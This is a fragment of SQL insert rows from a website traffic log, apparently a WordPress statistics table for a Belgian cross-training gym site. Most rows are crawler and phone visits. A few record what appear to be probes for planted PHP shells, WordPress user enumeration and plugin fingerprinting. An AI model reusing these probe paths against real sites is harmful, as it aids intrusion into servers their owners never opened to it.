(76823, 1499426342.047428, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76824, 1499426342.710695, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76825, 1499426343.333820, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76826, 1499426343.835239, 1838091214, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76827, 1499441006.480806, 872366382, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76828, 1499448270.702485, 3585737171, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mediatoolkitbot (complaints@mediatoolkit.com)'),
(76829, 1499451413.536665, 1123634307, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76830, 1499451414.756617, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76831, 1499451415.224802, 1123634231, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76832, 1499460140.278768, 1538595673, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76833, 1499460143.404912, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76834, 1499464297.590416, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76835, 1499464784.012860, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76836, 1499466568.516458, 3657083370, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76837, 1499468946.558718, 3024883461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76838, 1499470895.530988, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76839, 1499474269.770782, 1123634231, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76840, 1499475811.413515, 1570674694, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76841, 1499475814.834273, 1600959233, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76842, 1499478737.487093, 3110395569, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-statistics/readme.txt', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(76843, 1499485823.480916, 3657083370, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76844, 1499488357.271350, 2760155439, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76845, 1499492174.466384, 2420904848, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76846, 1499492176.236669, 2420904848, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76847, 1499492518.895856, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76848, 1499494052.681138, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76849, 1499494137.834208, 3024883602, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/js/\\\'+url+\\\'', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76850, 1499495159.803970, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76851, 1499496179.836205, 1123631626, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76852, 1499499628.203641, 2760155457, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76853, 1499501948.246780, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76854, 1499503628.563130, 608921439, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/pomo/w7388n.php', 'http://crosstrainingcenter.be/wp-includes/pomo/w7388n.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76855, 1499505564.464698, 1538595673, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76856, 1499507728.397634, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76857, 1499507761.192940, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76858, 1499508954.276051, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76859, 1499510168.545331, 1123634231, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76860, 1499511485.876604, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76861, 1499514118.564513, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76862, 1499514755.136154, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76863, 1499518452.524024, 676177789, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76864, 1499519685.460391, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76865, 1499526647.150465, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76866, 1499526647.859356, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76867, 1499526648.363675, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76868, 1499526648.889213, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76869, 1499526649.366191, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76870, 1499526649.883384, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76871, 1499526650.448594, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76872, 1499526650.901203, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76873, 1499526651.398130, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76874, 1499526651.943030, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76875, 1499526652.425063, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76876, 1499528317.948603, 3657084039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76877, 1499529037.292336, 1570674722, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76878, 1499529037.292594, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76879, 1499529041.485646, 2996488242, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76880, 1499536735.777731, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76881, 1499536736.421754, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76882, 1499536736.978126, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76883, 1499536737.917727, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76884, 1499536738.398977, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76885, 1499536738.877294, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76886, 1499536739.524836, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76887, 1499536740.014980, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76888, 1499536740.508379, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76889, 1499536740.992800, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76890, 1499536741.479265, 632835177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76891, 1499537636.482922, 632920713, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G920F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76892, 1499537638.572358, 632920713, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G920F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76893, 1499537640.618560, 632920713, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G920F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76894, 1499554320.769258, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76895, 1499555318.967680, 3024883477, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76896, 1499563903.721529, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76897, 1499564703.099662, 3024883489, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76898, 1499568256.581008, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css', 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76899, 1499568258.912636, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(76900, 1499572212.816191, 1054002081, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76901, 1499572213.516439, 1054002081, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/users/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(76902, 1499578681.643516, 1170583858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76903, 1499578703.119923, 1170583858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76904, 1499589680.239594, 783504431, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76905, 1499589680.856865, 783504431, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76906, 1499589681.307235, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76907, 1499589681.744567, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76908, 1499589682.167593, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76909, 1499589682.732832, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76910, 1499589683.281268, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76911, 1499589683.716428, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76912, 1499589684.221563, 783504431, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76913, 1499589684.758116, 3273261683, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76914, 1499589685.898112, 3273261683, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76915, 1499592113.877920, 1123635081, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76916, 1499594973.133931, 1837838730, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G920F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76917, 1499597540.786343, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76918, 1499620367.842947, 1123633613, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76919, 1499626326.183293, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76920, 1499626326.920086, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76921, 1499626327.386136, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76922, 1499626327.822682, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76923, 1499626328.286929, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76924, 1499626328.766189, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76925, 1499626329.296480, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76926, 1499626329.846540, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76927, 1499626330.298619, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76928, 1499626330.781347, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76929, 1499626331.194598, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76930, 1499634619.867355, 757138080, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/rnnvhs.php', 'http://crosstrainingcenter.be/wp-content/plugins/rnnvhs.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76931, 1499641133.709155, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76932, 1499642583.628570, 3488736748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)'),
(76933, 1499642587.301235, 3488736748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)'),
(76934, 1499669429.045470, 1760301570, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76935, 1499669434.033592, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76936, 1499669435.962363, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76937, 1499669438.849914, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76938, 1499669444.013222, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76939, 1499669453.837641, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76940, 1499669458.506916, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76941, 1499669463.418792, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76942, 1499669468.060233, 1760301570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(76943, 1499677630.794902, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76944, 1499677631.402707, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76945, 1499677631.877609, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76946, 1499677632.453869, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76947, 1499677632.879637, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
